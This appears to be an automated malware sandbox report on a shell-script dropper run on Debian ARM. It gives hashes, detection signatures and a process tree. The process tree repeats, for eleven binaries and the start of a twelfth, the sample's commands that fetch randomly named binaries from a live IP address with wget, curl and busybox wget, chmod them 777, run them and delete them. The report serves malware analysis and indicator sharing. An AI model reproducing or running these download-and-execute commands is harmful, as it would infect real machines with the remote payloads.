Analysis
-
max time kernel
36s -
max time network
59s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
18/10/2024, 01:46
Static task
static1
Behavioral task
behavioral1
Sample
583c9b647fbd1a7e1f6224f3df723a38dd970f41c31d9b37b9c69e4df5253bfd.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
583c9b647fbd1a7e1f6224f3df723a38dd970f41c31d9b37b9c69e4df5253bfd.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
583c9b647fbd1a7e1f6224f3df723a38dd970f41c31d9b37b9c69e4df5253bfd.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
583c9b647fbd1a7e1f6224f3df723a38dd970f41c31d9b37b9c69e4df5253bfd.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
583c9b647fbd1a7e1f6224f3df723a38dd970f41c31d9b37b9c69e4df5253bfd.sh
-
Size
10KB
-
MD5
623a04ed6371ab83886a40967de1807f
-
SHA1
b79de760571570719713803daace9ef35a7fb281
-
SHA256
583c9b647fbd1a7e1f6224f3df723a38dd970f41c31d9b37b9c69e4df5253bfd
-
SHA512
61c24d3ee1967f32bd51fdec5f23d5051a34d3c74a730cdbdb26d21e8add0ecd14055f5d237b316217733f5601bf5c93683212c4bf286f41e79e746aedb993fa
-
SSDEEP
96:JOZ51uhxcMJFckKObcQrE00J9aIK5DNqZ51uhxcYu9JF76k+PXMcQrE00N:JOZ51uhxXJOkKOmJou51uhxUdUXN
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 11 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 697 chmod 730 chmod 764 chmod 821 chmod 833 chmod 687 chmod 746 chmod 774 chmod 786 chmod 803 chmod 716 chmod -
Executes dropped EXE 11 IoCs
ioc pid Process /tmp/hhc7BkFLcnThZrYbertSK39KK7OVusPoHl 689 hhc7BkFLcnThZrYbertSK39KK7OVusPoHl /tmp/tFTCt6lZ18v65nyqAZPLpioGc9uDrTvDwk 698 tFTCt6lZ18v65nyqAZPLpioGc9uDrTvDwk /tmp/0G3VhZwFwsJsdYq8F5O4O2QOjZMFdYftlA 717 0G3VhZwFwsJsdYq8F5O4O2QOjZMFdYftlA /tmp/ZpWyOHyEj7Ae94lmJdr2lWlEmFM2jfLb8p 731 ZpWyOHyEj7Ae94lmJdr2lWlEmFM2jfLb8p /tmp/EeRtQKQmlEcbzh9MuxYaKuXdEM7jV8odt1 749 EeRtQKQmlEcbzh9MuxYaKuXdEM7jV8odt1 /tmp/wFrASh83dt0yAwoJITjsVVuRF0OkRS1z4k 766 wFrASh83dt0yAwoJITjsVVuRF0OkRS1z4k /tmp/kmdn50usaxiCeAMRSrvq1to0FmS6D67ADW 775 kmdn50usaxiCeAMRSrvq1to0FmS6D67ADW /tmp/03RqqZgd5SZIoaitQ6C0XuPRJBpaBgCRZY 787 03RqqZgd5SZIoaitQ6C0XuPRJBpaBgCRZY /tmp/XEonpRLiGIQSXp4nLlgJJNkA9M7WqlnsKv 805 XEonpRLiGIQSXp4nLlgJJNkA9M7WqlnsKv /tmp/tz5NUCGkQAskgJ4JmH7mlixD7HbatJRqDx 822 tz5NUCGkQAskgJ4JmH7mlixD7HbatJRqDx /tmp/R0jDVWqjRSi8MqBxHxO1sXLaRgCUxpu2qt 834 R0jDVWqjRSi8MqBxHxO1sXLaRgCUxpu2qt -
Checks CPU configuration 1 TTPs 11 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 11 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/0G3VhZwFwsJsdYq8F5O4O2QOjZMFdYftlA curl File opened for modification /tmp/EeRtQKQmlEcbzh9MuxYaKuXdEM7jV8odt1 curl File opened for modification /tmp/wFrASh83dt0yAwoJITjsVVuRF0OkRS1z4k curl File opened for modification /tmp/kmdn50usaxiCeAMRSrvq1to0FmS6D67ADW curl File opened for modification /tmp/03RqqZgd5SZIoaitQ6C0XuPRJBpaBgCRZY curl File opened for modification /tmp/XEonpRLiGIQSXp4nLlgJJNkA9M7WqlnsKv curl File opened for modification /tmp/R0jDVWqjRSi8MqBxHxO1sXLaRgCUxpu2qt curl File opened for modification /tmp/hhc7BkFLcnThZrYbertSK39KK7OVusPoHl curl File opened for modification /tmp/tFTCt6lZ18v65nyqAZPLpioGc9uDrTvDwk curl File opened for modification /tmp/ZpWyOHyEj7Ae94lmJdr2lWlEmFM2jfLb8p curl File opened for modification /tmp/tz5NUCGkQAskgJ4JmH7mlixD7HbatJRqDx curl
Processes
-
/tmp/583c9b647fbd1a7e1f6224f3df723a38dd970f41c31d9b37b9c69e4df5253bfd.sh/tmp/583c9b647fbd1a7e1f6224f3df723a38dd970f41c31d9b37b9c69e4df5253bfd.sh1⤵PID:657
-
/bin/rm/bin/rm bins.sh2⤵PID:663
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/hhc7BkFLcnThZrYbertSK39KK7OVusPoHl2⤵PID:665
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/hhc7BkFLcnThZrYbertSK39KK7OVusPoHl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:673
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hhc7BkFLcnThZrYbertSK39KK7OVusPoHl2⤵PID:684
-
-
/bin/chmodchmod 777 hhc7BkFLcnThZrYbertSK39KK7OVusPoHl2⤵
- File and Directory Permissions Modification
PID:687
-
-
/tmp/hhc7BkFLcnThZrYbertSK39KK7OVusPoHl./hhc7BkFLcnThZrYbertSK39KK7OVusPoHl2⤵
- Executes dropped EXE
PID:689
-
-
/bin/rmrm hhc7BkFLcnThZrYbertSK39KK7OVusPoHl2⤵PID:690
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tFTCt6lZ18v65nyqAZPLpioGc9uDrTvDwk2⤵PID:692
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tFTCt6lZ18v65nyqAZPLpioGc9uDrTvDwk2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:694
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tFTCt6lZ18v65nyqAZPLpioGc9uDrTvDwk2⤵PID:696
-
-
/bin/chmodchmod 777 tFTCt6lZ18v65nyqAZPLpioGc9uDrTvDwk2⤵
- File and Directory Permissions Modification
PID:697
-
-
/tmp/tFTCt6lZ18v65nyqAZPLpioGc9uDrTvDwk./tFTCt6lZ18v65nyqAZPLpioGc9uDrTvDwk2⤵
- Executes dropped EXE
PID:698
-
-
/bin/rmrm tFTCt6lZ18v65nyqAZPLpioGc9uDrTvDwk2⤵PID:699
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/0G3VhZwFwsJsdYq8F5O4O2QOjZMFdYftlA2⤵PID:700
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/0G3VhZwFwsJsdYq8F5O4O2QOjZMFdYftlA2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:703
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/0G3VhZwFwsJsdYq8F5O4O2QOjZMFdYftlA2⤵PID:708
-
-
/bin/chmodchmod 777 0G3VhZwFwsJsdYq8F5O4O2QOjZMFdYftlA2⤵
- File and Directory Permissions Modification
PID:716
-
-
/tmp/0G3VhZwFwsJsdYq8F5O4O2QOjZMFdYftlA./0G3VhZwFwsJsdYq8F5O4O2QOjZMFdYftlA2⤵
- Executes dropped EXE
PID:717
-
-
/bin/rmrm 0G3VhZwFwsJsdYq8F5O4O2QOjZMFdYftlA2⤵PID:719
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZpWyOHyEj7Ae94lmJdr2lWlEmFM2jfLb8p2⤵PID:720
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZpWyOHyEj7Ae94lmJdr2lWlEmFM2jfLb8p2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:723
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZpWyOHyEj7Ae94lmJdr2lWlEmFM2jfLb8p2⤵PID:727
-
-
/bin/chmodchmod 777 ZpWyOHyEj7Ae94lmJdr2lWlEmFM2jfLb8p2⤵
- File and Directory Permissions Modification
PID:730
-
-
/tmp/ZpWyOHyEj7Ae94lmJdr2lWlEmFM2jfLb8p./ZpWyOHyEj7Ae94lmJdr2lWlEmFM2jfLb8p2⤵
- Executes dropped EXE
PID:731
-
-
/bin/rmrm ZpWyOHyEj7Ae94lmJdr2lWlEmFM2jfLb8p2⤵PID:732
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/EeRtQKQmlEcbzh9MuxYaKuXdEM7jV8odt12⤵PID:734
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/EeRtQKQmlEcbzh9MuxYaKuXdEM7jV8odt12⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:737
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/EeRtQKQmlEcbzh9MuxYaKuXdEM7jV8odt12⤵PID:742
-
-
/bin/chmodchmod 777 EeRtQKQmlEcbzh9MuxYaKuXdEM7jV8odt12⤵
- File and Directory Permissions Modification
PID:746
-
-
/tmp/EeRtQKQmlEcbzh9MuxYaKuXdEM7jV8odt1./EeRtQKQmlEcbzh9MuxYaKuXdEM7jV8odt12⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm EeRtQKQmlEcbzh9MuxYaKuXdEM7jV8odt12⤵PID:751
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/wFrASh83dt0yAwoJITjsVVuRF0OkRS1z4k2⤵PID:752
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wFrASh83dt0yAwoJITjsVVuRF0OkRS1z4k2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:757
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wFrASh83dt0yAwoJITjsVVuRF0OkRS1z4k2⤵PID:762
-
-
/bin/chmodchmod 777 wFrASh83dt0yAwoJITjsVVuRF0OkRS1z4k2⤵
- File and Directory Permissions Modification
PID:764
-
-
/tmp/wFrASh83dt0yAwoJITjsVVuRF0OkRS1z4k./wFrASh83dt0yAwoJITjsVVuRF0OkRS1z4k2⤵
- Executes dropped EXE
PID:766
-
-
/bin/rmrm wFrASh83dt0yAwoJITjsVVuRF0OkRS1z4k2⤵PID:768
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/kmdn50usaxiCeAMRSrvq1to0FmS6D67ADW2⤵PID:769
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/kmdn50usaxiCeAMRSrvq1to0FmS6D67ADW2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:771
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/kmdn50usaxiCeAMRSrvq1to0FmS6D67ADW2⤵PID:773
-
-
/bin/chmodchmod 777 kmdn50usaxiCeAMRSrvq1to0FmS6D67ADW2⤵
- File and Directory Permissions Modification
PID:774
-
-
/tmp/kmdn50usaxiCeAMRSrvq1to0FmS6D67ADW./kmdn50usaxiCeAMRSrvq1to0FmS6D67ADW2⤵
- Executes dropped EXE
PID:775
-
-
/bin/rmrm kmdn50usaxiCeAMRSrvq1to0FmS6D67ADW2⤵PID:776
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/03RqqZgd5SZIoaitQ6C0XuPRJBpaBgCRZY2⤵PID:777
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/03RqqZgd5SZIoaitQ6C0XuPRJBpaBgCRZY2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:778
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/03RqqZgd5SZIoaitQ6C0XuPRJBpaBgCRZY2⤵PID:779
-
-
/bin/chmodchmod 777 03RqqZgd5SZIoaitQ6C0XuPRJBpaBgCRZY2⤵
- File and Directory Permissions Modification
PID:786
-
-
/tmp/03RqqZgd5SZIoaitQ6C0XuPRJBpaBgCRZY./03RqqZgd5SZIoaitQ6C0XuPRJBpaBgCRZY2⤵
- Executes dropped EXE
PID:787
-
-
/bin/rmrm 03RqqZgd5SZIoaitQ6C0XuPRJBpaBgCRZY2⤵PID:788
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/XEonpRLiGIQSXp4nLlgJJNkA9M7WqlnsKv2⤵PID:789
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/XEonpRLiGIQSXp4nLlgJJNkA9M7WqlnsKv2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:793
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/XEonpRLiGIQSXp4nLlgJJNkA9M7WqlnsKv2⤵PID:801
-
-
/bin/chmodchmod 777 XEonpRLiGIQSXp4nLlgJJNkA9M7WqlnsKv2⤵
- File and Directory Permissions Modification
PID:803
-
-
/tmp/XEonpRLiGIQSXp4nLlgJJNkA9M7WqlnsKv./XEonpRLiGIQSXp4nLlgJJNkA9M7WqlnsKv2⤵
- Executes dropped EXE
PID:805
-
-
/bin/rmrm XEonpRLiGIQSXp4nLlgJJNkA9M7WqlnsKv2⤵PID:806
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tz5NUCGkQAskgJ4JmH7mlixD7HbatJRqDx2⤵PID:808
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tz5NUCGkQAskgJ4JmH7mlixD7HbatJRqDx2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:814
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tz5NUCGkQAskgJ4JmH7mlixD7HbatJRqDx2⤵PID:818
-
-
/bin/chmodchmod 777 tz5NUCGkQAskgJ4JmH7mlixD7HbatJRqDx2⤵
- File and Directory Permissions Modification
PID:821
-
-
/tmp/tz5NUCGkQAskgJ4JmH7mlixD7HbatJRqDx./tz5NUCGkQAskgJ4JmH7mlixD7HbatJRqDx2⤵
- Executes dropped EXE
PID:822
-
-
/bin/rmrm tz5NUCGkQAskgJ4JmH7mlixD7HbatJRqDx2⤵PID:823
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/R0jDVWqjRSi8MqBxHxO1sXLaRgCUxpu2qt2⤵PID:824
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/R0jDVWqjRSi8MqBxHxO1sXLaRgCUxpu2qt2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:831
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/R0jDVWqjRSi8MqBxHxO1sXLaRgCUxpu2qt2⤵PID:832
-
-
/bin/chmodchmod 777 R0jDVWqjRSi8MqBxHxO1sXLaRgCUxpu2qt2⤵
- File and Directory Permissions Modification
PID:833
-
-
/tmp/R0jDVWqjRSi8MqBxHxO1sXLaRgCUxpu2qt./R0jDVWqjRSi8MqBxHxO1sXLaRgCUxpu2qt2⤵
- Executes dropped EXE
PID:834
-
-
/bin/rmrm R0jDVWqjRSi8MqBxHxO1sXLaRgCUxpu2qt2⤵PID:835
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fOyZSHBVPERsGL2cQAiuA0fmQm82eXgpgq2⤵PID:836
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97